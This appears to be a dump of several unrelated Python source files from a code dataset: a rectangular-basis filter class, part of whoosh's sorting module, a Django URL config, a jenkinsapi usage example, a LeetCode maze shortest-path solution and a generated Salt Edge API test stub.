            interpolated = np.zeros((edge_idx[-1] - edge_idx[0]))
            # Paint each rectangle's height over its index range.
            for i, coeff in enumerate(self.filter_coeff):
                interpolated[int(edge_idx[i]):int(edge_idx[i + 1])] = coeff
            t_support = np.arange(len(interpolated)) * dt
            return (t_support, interpolated)
        else:
            print ("Error: value of the filter coefficients does not match the number of basis functions!")

    def getNbOfBasisFunctions(self):
        """Return the number of rectangular basis functions."""
        self.computeBins()
        return int(self.bins_l)

    def getLength(self):
        """Return the total temporal extent of the filter (ms)."""
        return self.bins[-1]

    #############################################################################
    # Functions to compute convolutions
    #############################################################################

    def convolution_Spiketrain_basisfunctions(self, spks, T, dt):
        """Convolve a spike train with every basis function.

        Returns a (T/dt, nb_bins) design matrix whose column j counts, at
        each time step, how many spikes fall inside basis window j.
        """
        n_steps = int(T / dt)
        edge_idx = Tools.timeToIndex(self.bins, dt)
        spk_idx = Tools.timeToIndex(spks, dt)
        nb_bins = self.getNbOfBasisFunctions()

        X = np.zeros((n_steps, nb_bins))
        for j in np.arange(nb_bins):
            # Padded accumulator so spikes near T do not overflow the array.
            acc = np.zeros(n_steps + edge_idx[-1] + 1)
            for s in spk_idx:
                acc[s + edge_idx[j]:s + edge_idx[j + 1]] += 1
            X[:, j] = acc[:n_steps]
        return X

    def convolution_ContinuousSignal_basisfunctions(self, I, dt):
        """Convolve a continuous signal I with every basis function.

        Returns a (len(I), nb_bins) design matrix; column j is I convolved
        with the j-th rectangular window (scaled by dt) and delayed by the
        window's left edge.
        """
        n_steps = len(I)
        edge_idx = Tools.timeToIndex(self.bins, dt)
        nb_bins = self.getNbOfBasisFunctions()

        X = np.zeros((n_steps, nb_bins))
        signal = np.array(I, dtype='float64')
        for j in np.arange(nb_bins):
            window = np.ones(edge_idx[j + 1] - edge_idx[j], dtype='float64')
            conv = fftconvolve(window, signal, mode='full') * dt
            conv = conv[:int(len(I))]
            # Shift by the window's offset from t=0.
            shifted = np.concatenate((np.zeros(int(edge_idx[j])), conv))
            X[:, j] = np.array(shifted[:n_steps], dtype='double')
        return X

    ########################################################################################
    # AUXILIARY METHODS USED BY THIS PARTICULAR IMPLEMENTATION OF FILTER
    ########################################################################################

    def computeBins(self):
        """Recompute bin edges, centers and count from the metaparameters.

        Bin widths grow as binsize_lb * exp(i/slope), capped at binsize_ub,
        until the accumulated length exceeds p_length.
        """
        self.bins = [0]
        cnt = 1
        total_length = 0
        while total_length <= self.p_length:
            width = min(self.p_binsize_lb * np.exp(cnt / self.p_slope), self.p_binsize_ub)
            total_length = total_length + width
            self.bins.append(total_length)
            cnt += 1

        self.bins = np.array(self.bins)
        self.support = np.array([(lo + hi) / 2 for lo, hi in zip(self.bins[:-1], self.bins[1:])])
        self.bins_l = len(self.bins) - 1

    def setMetaParameters(self, length=1000.0, binsize_lb=2.0, binsize_ub=1000.0, slope=7.0):
        """Replace the basis metaparameters.

        Attention: every change of metaparameters resets the filter to zero.
        """
        self.p_length = length
        self.p_binsize_lb = binsize_lb
        self.p_binsize_ub = binsize_ub
        self.p_slope = slope
        self.computeBins()
        self.setFilter_toZero()
|
bdh1011/cupeye | venv/lib/python2.7/site-packages/whoosh/sorting.py | Python | bsd-3-clause | 41,932 | 0.000191 | # Copyright 2011 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from array import array
from collections import defaultdict
from whoosh.compat import string_type
from whoosh.compat import iteritems, izip, xrange
# Faceting objects
class FacetType(object):
    """Base class for "facets", aspects that can be sorted/faceted."""

    maptype = None

    def categorizer(self, global_searcher):
        """Returns a :class:`Categorizer` corresponding to this facet.

        :param global_searcher: A parent searcher. You can use this searcher
            if you need global document ID references.
        """
        raise NotImplementedError

    def map(self, default=None):
        # Resolution order: explicit maptype, then the caller's default,
        # then a fresh OrderedList.
        chosen = self.maptype
        if chosen is None:
            chosen = default
        if chosen is None:
            return OrderedList()
        if type(chosen) is type:
            # A bare class was supplied: instantiate it.
            return chosen()
        return chosen

    def default_name(self):
        return "facet"
class Categorizer(object):
    """Base class for categorizer objects, which compute a key value for a
    document based on certain criteria, for use in sorting/faceting.

    Categorizers are created by FacetType objects through the
    :meth:`FacetType.categorizer` method.  The
    :class:`whoosh.searching.Searcher` passed to that method may be a
    composite searcher (wrapping a multi-reader), but categorizers are
    always run **per-segment**, with segment-relative document numbers.

    The collector calls ``set_searcher`` as it moves through the segments,
    letting the categorizer set up whatever segment-specific state it needs.

    ``allow_overlap`` should be ``True`` if the caller may use ``keys_for``
    (grouping documents into potentially overlapping groups) instead of
    ``key_for``.  The default is ``False``.

    If a subclass can categorize a document from its document number alone,
    it should leave ``needs_current`` as ``False`` (the default) and must
    NOT use the matcher passed to ``key_for``/``keys_for``, because in that
    case ``segment_docnum`` is not guaranteed to be consistent with the
    matcher.  A subclass that needs matcher state must set
    ``needs_current`` to ``True``, which prevents the caller from applying
    optimizations that could leave the matcher inconsistent.
    """

    allow_overlap = False
    needs_current = False

    def set_searcher(self, segment_searcher, docoffset):
        """Called by the collector when it moves to a new segment.

        ``segment_searcher`` is atomic.  ``docoffset`` is the offset of this
        segment's document numbers relative to the entire index; add it to a
        segment-relative docnum to get an absolute docnum.
        """
        pass

    def key_for(self, matcher, segment_docnum):
        """Returns a key for the current match.

        :param matcher: a :class:`whoosh.matching.Matcher` object. If
            ``self.needs_current`` is ``False``, DO NOT use this object,
            since it may be inconsistent; use ``segment_docnum`` instead.
        :param segment_docnum: the segment-relative document number of the
            current match.
        """
        # Backwards-compatible dispatch to the legacy hook names.
        if hasattr(self, "key_for_id"):
            return self.key_for_id(segment_docnum)
        if hasattr(self, "key_for_matcher"):
            return self.key_for_matcher(matcher)

        raise NotImplementedError(self.__class__)

    def keys_for(self, matcher, segment_docnum):
        """Yields a series of keys for the current match.  Called instead of
        ``key_for`` when ``self.allow_overlap`` is ``True``.

        :param matcher: a :class:`whoosh.matching.Matcher` object. If
            ``self.needs_current`` is ``False``, DO NOT use this object,
            since it may be inconsistent; use ``segment_docnum`` instead.
        :param segment_docnum: the segment-relative document number of the
            current match.
        """
        # Backwards-compatible dispatch to the legacy hook name.
        if hasattr(self, "keys_for_id"):
            return self.keys_for_id(segment_docnum)

        raise NotImplementedError(self.__class__)

    def key_to_name(self, key):
        """Returns a representation of the key to be used as a dictionary key
        in faceting.  For example, the sorting key for date fields is a large
        integer; this method translates it into a ``datetime`` object to make
        the groupings clearer.
        """
        return key
# General field facet
class FieldFacet(FacetType):
"""Sorts/facets by the contents of a field.
For example, to sort by the contents of the "path" field in reverse order,
and facet by the contents of the "tag" field::
paths = FieldFacet("path", reverse=True)
tags = FieldFacet("tag")
results = searcher.search(myquery, sortedby=paths, groupedby=tags)
This facet returns different categorizers based on the field type.
"""
def __init__(self, fieldname, reverse=False, allow_overlap=False,
maptype=None):
"""
:param fieldname: the name of the field to sort/facet on.
:param reverse: if True, when sorting, reverse the sort order of this
facet.
:param allow_overlap: if True, when grouping, allow documents to appear
in multiple groups when they have multiple terms in the field.
"""
self.fieldname = fieldname
self.reverse = reverse
self.allow_overlap = allow_overlap
self.maptype = maptype
def default_name(self):
return self.fieldname
def categorizer(self, global_searcher):
# The searcher we're passed here may wrap a multireader, but the
# actual key functions will always be called per-segment following a
# Categorizer.set_searcher method call
fieldname = self.fieldname
fieldobj = global_searcher.schema[fieldname]
# If we're grouping with allow_overlap=True, all we can use is
# OverlappingCategorizer
if self.allow_overlap:
return OverlappingCategorizer(global_searcher, fieldname)
if global_searcher.reader().has_column(fieldname):
coltype = fieldobj.column_typ |
aabdulwahed/wms | app/api/urls.py | Python | apache-2.0 | 161 | 0.006211 | from django.conf.urls import include, url
from .views import UpdateStatus
# URL routes for the status API: POST/GET /update/ is handled by the
# UpdateStatus class-based view.
urlpatterns = [
    url(r'^update/$', UpdateStatus.as_view(), name='update status'),
]
117111302/jenkinsapi | examples/how_to/query_a_build.py | Python | mit | 893 | 0 | from __future__ import print_function
from jenkinsapi.view import View
from jenkinsapi.jenkins import Jenkins
J = Jenkins('http://localhost:8080')
print(J.items())
j = J['foo']
j = J.get_job("foo")
b = j.get_last_build()
print(b)
mjn = b.get_master_job_name()
print(mjn)
EMPTY_JOB_CONFIG = '''\
<?xml version='1.0' encoding='UTF-8'?>
<project>
<actions/>
<description></description>
<keepDependencies>false</keepDependencies>
<properties/>
<scm class="hudson.scm.NullSCM"/>
<canRoam>true</canRo | am>
<disabled>false</disabled>
<blockBuildWhenDownstreamBuilding>false</blockBuildWhenDownstreamBuilding>
<blockBuildWhenUpstreamBuilding>false</blockBuildWhenUpstreamBuilding>
<triggers class="vector"/>
<concurrentBuild>false</concurrentBuild>
<builders/>
<publishers/>
<buildWrappers/ | >
</project>
'''
new_job = J.create_job(name='foo_job', config=EMPTY_JOB_CONFIG)
|
yiwen-luo/LeetCode | Python/the-maze-ii.py | Python | mit | 1,267 | 0.003946 | # Time: O(max(r, c) * wlogw)
# Space: O(w)
class Solution(object):
    def shortestDistance(self, maze, start, destination):
        """
        :type maze: List[List[int]]
        :type start: List[int]
        :type destination: List[int]
        :rtype: int

        Dijkstra over "stopping" positions: the ball rolls in one of four
        directions until it hits a wall (cell value 1) or the border; each
        stop is a graph node and the edge weight is the number of cells
        rolled.  Returns the minimum rolling distance from start to
        destination, or -1 if the destination cannot be reached.
        """
        import heapq  # fix: heapq was used below but never imported

        start, destination = tuple(start), tuple(destination)

        def neighbors(node):
            # Yield (distance, stop_position) for each rolling direction.
            for dr, dc in ((-1, 0), (0, 1), (0, -1), (1, 0)):
                r, c = node
                dist = 0
                while (0 <= r + dr < len(maze) and
                       0 <= c + dc < len(maze[0]) and
                       not maze[r + dr][c + dc]):
                    r += dr
                    c += dc
                    dist += 1
                yield dist, (r, c)

        heap = [(0, start)]
        visited = set()
        while heap:
            dist, node = heapq.heappop(heap)
            if node in visited:
                continue
            if node == destination:
                return dist
            visited.add(node)
            for step, nxt in neighbors(node):
                heapq.heappush(heap, (dist + step, nxt))
        return -1
|
ltowarek/budget-supervisor | third_party/saltedge/test/test_currencies_api.py | Python | mit | 831 | 0 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: su | pport@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.api.currencies_api import CurrenciesApi # noqa: E501
from swagger_client.rest import ApiException
class TestCurrenciesApi(unittest.TestCase):
    """CurrenciesApi unit test stubs"""

    def setUp(self):
        # A fresh client instance for every test case.
        self.api = CurrenciesApi()  # noqa: E501

    def tearDown(self):
        # Nothing to clean up for these generated stubs.
        pass

    def test_currencies_get(self):
        """Test case for currencies_get

        List of currencies  # noqa: E501
        """
        # Generated scaffolding: the actual request/response check is still
        # to be written.
        pass


if __name__ == '__main__':
    unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.